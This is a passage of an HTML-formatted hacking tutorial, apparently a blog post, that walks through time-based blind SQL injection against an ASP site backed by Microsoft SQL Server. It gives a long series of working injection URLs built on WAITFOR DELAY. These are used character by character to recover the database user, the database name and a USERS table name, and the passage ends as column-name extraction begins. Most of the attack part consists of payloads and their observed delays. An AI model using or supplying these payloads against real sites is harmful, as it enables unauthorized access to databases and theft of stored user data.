auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),2,1)))&amp;gt;99) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;second character is a C&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;look closely at what changed at the code. instead of 1,1 it is 2,1 because i wanted to know the second character of user.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Third character:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;99) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;100) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;101) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),3,1)))&amp;gt;102) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Third is an F yet again&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_watch" name="AdBriteInlineAd_watch" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;watch&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;the code i changed 2,1 in 3,1.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;fourth&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;99) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;100) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;101) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((user),4,1)))&amp;gt;102) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;fourth character is yet again an F.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we now have the four characters i needed:&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;ECFF = user.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;What a&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_hell" name="AdBriteInlineAd_hell" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;hell&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;of a job for 4 characters...&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;No, no we are not finished yet.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Extracting the db name.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Same as before database wants us to have a hell of a job, its a bitch.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;now lets hope that god damn administrator likes short names (THEY DONT)&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to know how many characters the db name hase. not much difference.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; if (len(db_name())=1) WAITFOR DELAY '00:00:10'-- [no delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;i said database: does db_name have only one character? database said no my admin hates that.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;so we need to run down the whole thing again. changing the =1 into =2, =3 and so on.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;untill he waites 10 seconds.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; if (len(db_name())=3) WAITFOR DELAY '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;our db name has 3 characters (in real cases they will probebly end up in 8 or 10 characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;but this is a tutorial. i wont&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_type" name="AdBriteInlineAd_type" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;type&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;a milion characters. if you did not get it by now XD sorry for you.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;first character.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),1,1)))&amp;gt;99) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;first character is C&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))&amp;gt;99) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))&amp;gt;100) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),2,1)))&amp;gt;101) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;second character is an E watch the limit again 1,1 changed to 2,1.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))&amp;gt;97) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))&amp;gt;98) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))&amp;gt;99) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))&amp;gt;100) waitfor delay '00:00:10'-- [no delay]&lt;br /&gt;www[site].com/index.asp?id=1; IF (ascii(lower(substring((db_name),3,1)))&amp;gt;101) waitfor delay '00:00:10'-- [10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;last letter is another E&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;db_name = CEE&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Extracting database tables&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;the principal remains the same.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;IT IS EASY. but if you want to go out&amp;nbsp;&lt;/span&gt;&lt;a href="" id="AdBriteInlineAd_door" name="AdBriteInlineAd_door" style="-webkit-background-clip: padding-box; background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; color: #006600; cursor: pointer; font-family: sans-serif; font-size: 13px; line-height: 18px; margin-bottom: -2px; outline-color: initial; outline-style: none; outline-width: initial; padding-bottom: 2px; text-align: center; text-decoration: none;" target="_top"&gt;door&lt;/a&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;&amp;nbsp;once in a while.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;avoid blind sqli..&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to know how mutch characters it hase ans we need to know what characters it has.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;by now you should know the drill.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;This one has 5 characters.&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www[site].com/index.asp?id=1; if (len(select top 1 name from sysobjects where xtype='U')=5) waitfor delay'00:00:10'--[10 second delay]&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;we need to know the characters.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px;"&gt;Code:&lt;/div&gt;&lt;div class="body" dir="ltr"&gt;&lt;code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;First is an U.&lt;br /&gt;http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'-- (+10 seconds)&lt;br /&gt;&lt;br /&gt;second an S.&lt;br /&gt;http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)&lt;br /&gt;&lt;br /&gt;Third an E.&lt;br /&gt;http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'-- (+10 seconds)&lt;br /&gt;&lt;br /&gt;Fourth an R.&lt;br /&gt;http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)&lt;br /&gt;&lt;br /&gt;Fifth an S.&lt;br /&gt;http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'-- (+10 seconds)&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Table name is USERS.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; color: orange; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;Extracting table column names.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;"&gt;how many characters does this column have. we know how it works ppl.&lt;/span&gt;&lt;br style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 18px; text-align: center;" /&gt;&lt;div class="codeblock" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 1px; font-family: sans-serif; font-size: 13px; line-height: 18px; padding-bottom: 4px; padding-left: 4px; padding-right: 4px; padding-top: 4px; text-align: center;"&gt;&lt;div class="title" style="border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-weight: bold; margin-bottom: 4px; margin-left: 0px; 